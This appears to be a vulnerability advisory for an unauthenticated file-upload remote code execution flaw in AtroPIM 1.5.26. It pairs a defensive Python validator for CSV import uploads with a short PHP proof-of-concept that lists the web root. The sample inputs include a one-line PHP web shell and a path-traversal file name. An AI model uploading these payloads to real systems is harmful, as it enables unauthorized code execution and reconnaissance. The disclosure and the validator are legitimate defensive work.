atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal
Vendor
Description:
The Create Import Feed option (the glyphicon-glyphicon-paperclip attachment button, CSV format upload) appears to be vulnerable to an unauthenticated file upload leading to remote code execution, with user interaction. An attacker can upload a malicious file, then request it remotely to execute it and obtain very sensitive information about the configuration of the system, which can then be used to mount a far more damaging attack.
STATUS: HIGH/CRITICAL vulnerability
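The root cause described above is that the import feed accepts whatever the client sends and stores it where the web server will later execute it. The following is an added example, not AtroPIM code and not the author's exploit: a server-side validator for a CSV import upload that rejects the things the attack relies on (a script extension, a script extension hidden under .csv, path components in the name, a PHP open tag or binary content in the body) and stores accepted files under a server-chosen random name. The sample uploads, the function names and the upload directory are constructed for the example.

```python
import os
import re
import secrets

# Constructed sample uploads (client-supplied filename, file body).
# Illustrative inputs only, not files taken from a real AtroPIM instance.
SAMPLE_UPLOADS = {
    "products.csv": b"sku,name,price\r\nA1,Widget,9.99\r\nA2,Gadget,19.50\r\n",
    "shell.php": b"<?php system($_GET['c']); ?>",
    "shell.php.csv": b"<?php phpinfo(); ?>",
    "listing.csv": b"<?php print_r(scandir('/var/www/')); ?>",
    "../../etc/cron.d/job.csv": b"sku\n1\n",
    "notes.csv": b"sku,name\n1,\x00binary\n",
}

ALLOWED_EXTENSIONS = {".csv"}
SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def validate_import_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Decide whether an import-feed upload is an acceptable CSV.

    Returns (accepted, reason). The checks are deliberately independent:
    an attacker who defeats one (e.g. by naming a PHP file .csv) is still
    caught by the next.
    """
    # 1. The client name must be a bare file name: no directory components.
    if filename != os.path.basename(filename) or filename in ("", ".", ".."):
        return False, "filename contains path components"
    if filename.startswith("."):
        return False, "hidden file name"

    # 2. Only .csv is accepted, and no interpreted-script extension may be
    #    hiding in front of it (shell.php.csv).
    stem, ext = os.path.splitext(filename)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if os.path.splitext(stem)[1].lower() in SCRIPT_EXTENSIONS:
        return False, "double extension with script type"

    # 3. A CSV is text. Reject NUL bytes, non-UTF-8 bodies, and any PHP
    #    open tag anywhere in the content.
    if b"\x00" in content:
        return False, "NUL byte in content"
    try:
        content.decode("utf-8")
    except UnicodeDecodeError:
        return False, "content is not UTF-8 text"
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag in content"
    return True, "ok"


def storage_path(upload_dir: str) -> str:
    """Pick a server-chosen random name under upload_dir.

    The client-supplied name is never used on disk. upload_dir is assumed
    to live outside the web root, so even a file that slipped past the
    content checks is never served or executed by the web server.
    """
    return os.path.join(upload_dir, secrets.token_hex(16) + ".csv")


def triage_uploads(uploads: dict[str, bytes]) -> dict[str, tuple[bool, str]]:
    """Run the validator over a batch of (name, body) pairs."""
    return {name: validate_import_upload(name, body) for name, body in uploads.items()}


if __name__ == "__main__":
    for name, (ok, reason) in triage_uploads(SAMPLE_UPLOADS).items():
        print(f"{'ACCEPT' if ok else 'REJECT'} {name!r}: {reason}")
```

Of the constructed samples only products.csv is accepted; the PHP listing payload of the kind shown in the exploit section below is rejected by the open-tag check even when it carries a .csv name, and the traversal-style name is rejected before the extension is even looked at.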
[+]Exploit:
<?php
// by nu11secur1ty - 2023
// PoC payload: once uploaded through the import feed and requested over
// HTTP, it lists the web root in both orders and returns the listing to
// the caller, which confirms that the uploaded file is executed as PHP.
$dir = "/var/www/";
$ascending_order = scandir($dir);
$descending_order = scandir($dir,1);
print_r($ascending_order);
print_r($descending_order);
?>
Reproduce:
Reference:
Proof and Exploit:
Time spend:
00:15:00
